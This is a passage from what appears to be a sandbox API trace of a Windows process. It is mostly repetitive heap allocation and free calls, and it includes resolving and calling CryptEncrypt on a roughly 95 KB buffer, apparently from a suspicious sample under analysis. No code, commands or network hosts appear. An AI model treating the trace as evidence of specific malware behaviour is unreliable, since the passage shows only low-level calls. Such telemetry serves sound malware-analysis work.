wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.308] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.309] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.309] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.309] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.309] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34f0ab8 | out: hHeap=0x25c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.313] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0206.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9f18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.315] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0206.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a30 [0206.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0206.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.316] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x17426, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x17428) returned 1 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.320] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.321] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.321] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.321] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0206.321] CharLowerBuffW (in: lpsz="byte[95272]", cchLength=0xb | out: lpsz="byte[95272]") returned 0xb [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, 